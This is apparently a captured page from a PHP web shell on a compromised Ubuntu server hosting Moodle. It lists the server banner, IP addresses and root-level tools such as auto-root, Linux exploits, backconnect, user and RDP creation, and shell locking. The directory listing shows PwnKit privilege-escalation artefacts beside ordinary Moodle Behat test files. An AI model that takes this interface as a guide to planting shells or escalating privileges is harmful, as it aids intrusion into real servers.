Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
blog /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
blog_entry.feature
1.16
KB
-rwxrwxrwx
blog_visibility.feature
1.32
KB
-rwxrwxrwx
comment.feature
2.91
KB
-rwxrwxrwx
delete.feature
1.64
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : blog_entry.feature
@core @core_blog @_file_upload @javascript Feature: Blog entries can be added, modified and deleted In order to modify or delete a blog entry As a user I need to be able to add a blog entry Background: Given the following "users" exist: | username | firstname | lastname | email | | testuser | Test | User | moodle@example.com | And I am on the "testuser" "user > profile" page logged in as testuser And I follow "Blog entries" And I follow "Add a new entry" And I should see "Blogs: Add a new entry" And I set the following fields to these values: | Entry title | Entry 1 | | Blog entry body | Entry 1 content | | Attachment | lib/tests/fixtures/gd-logo.png | And I press "Save changes" Scenario: Modify a blog entry When I click on "Edit" "link" And I set the following fields to these values: | Entry title | Blog entry 1 | And I press "Save changes" Then I should see "Blog entry 1" Scenario: Delete a blog entry When I click on "Delete" "link" And I press "Continue" Then I should not see "Entry 1" And I should see "Add a new entry"
Close